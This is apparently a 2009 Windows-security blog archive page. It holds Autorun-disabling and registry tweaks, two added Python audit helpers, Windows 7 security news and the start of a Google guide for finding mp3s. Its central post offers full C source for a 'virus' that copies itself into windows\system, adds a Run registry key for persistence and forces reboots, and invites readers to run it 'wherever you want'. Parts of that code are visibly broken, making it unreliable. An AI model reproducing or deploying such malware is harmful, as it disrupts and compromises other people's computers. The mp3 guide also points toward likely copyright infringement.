
Archive for August, 2009

How to disable autorun(.inf) to prevent autorun Trojan

To disable Autorun system-wide (for all users) on all drives, save the following script as a .reg file and double-click it to merge it into the registry:

======================================================
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"HonorAutoRunSetting"=dword:00000001
"NoDriveTypeAutoRun"=dword:000000ff

=======================================================
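To check that the setting is really in place, the policy key can be exported to a .reg file and audited offline. The following is an added example, not part of the original post: it parses .reg text and decodes the NoDriveTypeAutoRun bitmask per drive type; the function names and the weaker 0x91 sample are constructed for illustration.

```python
import re

# NoDriveTypeAutoRun is a bitmask: a set bit disables AutoRun for that drive type.
DRIVE_BITS = {
    0x01: "unknown type", 0x04: "removable", 0x08: "fixed", 0x10: "network",
    0x20: "CD-ROM", 0x40: "RAM disk", 0x80: "unknown type (reserved)",
}
POLICY_KEY = r"hkey_local_machine\software\microsoft\windows\currentversion\policies\explorer"

def parse_reg(text):
    """Parse .reg text into {lowercased key: {value name: int}} (dword values only)."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        header = re.fullmatch(r"\[(.+)\]", line)
        if header:
            current = keys.setdefault(header.group(1).lower(), {})
            continue
        value = re.fullmatch(r'"([^"]+)"=dword:([0-9a-fA-F]{8})', line)
        if value and current is not None:
            current[value.group(1)] = int(value.group(2), 16)
    return keys

def audit_autorun(text):
    """Return (ok, findings) for the machine-wide AutoRun policy in a .reg export."""
    values = parse_reg(text).get(POLICY_KEY, {})
    findings = []
    mask = values.get("NoDriveTypeAutoRun")
    if mask is None:
        findings.append("NoDriveTypeAutoRun is not set")
    else:
        enabled = [name for bit, name in DRIVE_BITS.items() if not mask & bit]
        if enabled:
            findings.append("AutoRun still enabled for: " + ", ".join(enabled))
    if values.get("HonorAutoRunSetting") != 1:
        findings.append("HonorAutoRunSetting is not 1")
    return (not findings, findings)

# Constructed samples: the settings from this page, and a weaker mask (0x91).
GOOD = '''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer]
"HonorAutoRunSetting"=dword:00000001
"NoDriveTypeAutoRun"=dword:000000ff
'''
WEAK = GOOD.replace("000000ff", "00000091").replace('"HonorAutoRunSetting"=dword:00000001\n', "")

if __name__ == "__main__":
    for label, sample in (("good", GOOD), ("weak", WEAK)):
        print(label, audit_autorun(sample))
```

Files written by reg export are UTF-16 encoded, so decode them accordingly before passing the text to audit_autorun.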


A program which restart pc when opened ( virus ) in C

August 13th, 2009 1 comment

Many people have asked me how to create viruses and similar stuff. Here is a simple virus/program which will restart your computer when opened. All you have to do is compile it and then run it wherever you want. Don’t worry if you run it accidentally on your system; I’ll also tell you how to remove this virus from your system completely.

:-)

Source Code:

#include<stdio.h>

#include<dos.h>

#include<dir.h> /If you get error, try using direct.h, if still you get error try compiling it in windows xp

int found,drive_no;char buff[128];

void findroot()

{

int done;

struct ffblk ffblk; //File block structure

done=findfirst("C:\\windows\\system",&ffblk,FA_DIREC); //to determine the root drive

if(done==0)

{

done=findfirst("C:\\windows\\system\\sysres.exe",&ffblk,0); //to determine whether the virus is already installed or not

if(done==0)

{

found=1; //means that the system is already infected

return;

}

drive_no=1;

return;

}

done=findfirst("D:\\windows\\system",&ffblk,FA_DIREC);

if(done==0)

{

done=findfirst("D:\\windows\\system\\sysres.exe",&ffblk,0);

if

(done==0)

{

found=1;return;

}

drive_no=2;

return;

}

done=findfirst("E:\\windows\\system",&ffblk,FA_DIREC);

if(done==0)

{

done=findfirst("E:\\windows\\system\\sysres.exe",&ffblk,0);

if(done==0)

{

found=1;

return;

}

drive_no=3;

return;

}

done=findfirst("F:\\windows\\system",&ffblk,FA_DIREC);

if(done==0)

{

done=findfirst("F:\\windows\\system\\sysres.exe",&ffblk,0);

if(done==0)

{

found=1;

return;

}

drive_no=4;

return;

}

else

exit(0);

}

void main()

{

FILE *self,*target;

findroot();

if(found==0) //if the system is not already infected

{

self=fopen(_argv[0],”rb”); //The virus file open’s itself

switch(drive_no)

{

case 1:

target=fopen("C:\\windows\\system\\sysres.exe","welcome back"); //to place a copy of itself in a remote place

system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \/v sres \/t REG_SZ \/d C:\\windows\\system\\ sysres.exe"); //put this file to registry for starup

break;

case 2:

target=fopen("D:\\windows\\system\\sysres.exe","welcome back");

system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \/v sres \/t REG_SZ \/dD:\\windows\\system\\sysres.exe");

break;

case 3:

target=fopen("E:\\windows\\system\\sysres.exe","welcome back");

system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \/v sres \/t REG_SZ \/dE:\\windows\\system\\sysres.exe");

break;

case 4:

target=fopen("F:\\windows\\system\\sysres.exe","welcome back");

system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \/v sres \/t REG_SZ \/dF:\\windows\\system\\sysres.exe");

break;

default:

exit(0);

}

while(fread(buff,1,1,self)>0)

fwrite(buff,1,1,target);

fcloseall();

}

else

system("shutdown -r -t 0"); //if the system is already infected then just give a command to restart

}

How to recover/remove the virus:

1) Boot the PC in safe mode.

2) Go to C:\windows\system; you will find it (sysres) there, so delete it.

3) Open the registry at:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

4) You will find it there as well; delete that entry too.

If anything else goes wrong, feel free to contact me :-)
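The removal steps above can be turned into a check: list the Run key with reg query and flag any value that launches an executable from <drive>:\windows\system\. This is an added example, not part of the original post; the function names, the sample output and the heuristic itself are assumptions made for illustration.

```python
import re

RUN_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
# A value line of `reg query` output: indented name, type, data.
VALUE_LINE = re.compile(r"^\s+(?P<name>.+?)\s+REG_(?:EXPAND_)?SZ\s+(?P<data>.*)$")
# Assumption (heuristic): an autostart program sitting directly in
# <drive>:\windows\system\ (not system32) deserves a closer look.
DROPPED = re.compile(r'^"?(?P<exe>[a-z]:\\windows\\system\\[^"\\]+\.exe)', re.I)

def suspicious_run_entries(reg_query_output):
    """Return [(value_name, exe_path)] for Run values launching from \\windows\\system\\."""
    hits = []
    for line in reg_query_output.splitlines():
        value = VALUE_LINE.match(line)
        if not value:
            continue  # key header or blank line
        target = DROPPED.match(value.group("data").strip())
        if target:
            hits.append((value.group("name"), target.group("exe")))
    return hits

def cleanup_commands(hits):
    """Commands matching removal steps 2-4: delete the file, then the Run value."""
    commands = []
    for name, exe in hits:
        commands.append('del "%s"' % exe)
        commands.append('reg delete "%s" /v "%s" /f' % (RUN_KEY, name))
    return commands

# Constructed sample of `reg query` output for the Run key (not captured from a real host).
SAMPLE = r'''
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    ctfmon.exe    REG_SZ    C:\WINDOWS\system32\ctfmon.exe
    sres    REG_SZ    D:\windows\system\sysres.exe
    Updater    REG_SZ    "C:\Program Files\Updater\updater.exe" /background
'''

if __name__ == "__main__":
    found = suspicious_run_entries(SAMPLE)
    print(found)
    for command in cleanup_commands(found):
        print(command)  # review before running, ideally from safe mode
```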

Top 5 ways to Secure Windows 7

August 11th, 2009 1 comment

Windows 7 (formerly known as Vienna and Blackcomb) is a completely new version in the Windows series, introduced by Microsoft for use on personal computers, including business PCs. Security and usability are closely related, and software developers often sacrifice one for the other.

Microsoft is NO Exception.


It’s time to get rid of Windows – Computerworld Blogs

Anyone who knows anything about security knows that this kind of disaster was only a matter of time. Windows botnets are responsible for DDoS attacks and most of e-mail spam. You cannot secure Windows.


Power-hungry supercomputers going green

Speed and power have long been the most important criteria when judging a supercomputer’s worth as a number-crunching lab workhorse, but energy efficiency is fast catching up. The greenest supercomputers are those that can process the most scientific calculations per second while drawing the least power. [More]


Microsoft Security Essentials lists Windows 7 UAC hack as malware

Leo Davidson released a proof-of-concept showcasing Windows 7 User Account Control feature flaw elevating a command prompt window using the whitelisted explorer.exe process.


Windows Registry Tweaks

REGISTRY EDITINGS
To open Windows Registry:
1. Click Start and Run
2. Type "regedit" (without quotes)

Configure Remote Access Client Account Lockout (Windows 2000/XP)
You can use the remote access account lockout feature to specify how many times a remote access authentication has to fail against a valid user account before the user is denied access. Use this tweak to set the number of failed logins before the account is locked out and the time before the lockout is reset.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteAccess\Parameters\AccountLockout


Disable the Ability to Right Click on the Desktop (All Windows)

This tweak removes the context menu that would normally appear when the user right clicks on the desktop or in the Explorer right results pane.

Open your registry and find or create the key below. Create a new DWORD value, or modify the existing value, called "NoViewContextMenu" and set it according to the value data below.

Exit the registry editor; you may need to restart or log out of Windows for the change to take effect.

User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
Value Name: NoViewContextMenu
Data Type: REG_DWORD (DWORD Value)
Value Data: (0 = disabled, 1 = enabled)


Advance Google Search Tutorial

Hello everyone,
I’ve seen many people having problems searching.
Here are a few tips/tricks on how to search using Google.

Searching Google for Music – Advanced Guide

This How-To will teach you how to use Google to find mp3s. This How-To
will be highly pragmatic and will focus on the hows and not the
wherefores of the various search strings.

Index
———————————————————————-
0) Key
1) Directories
2) Xitami Servers
3) Directory Listing
4) Andromeda Servers
5) Zina Artists
6) Apache mp3 Servers
7) Individual Songs
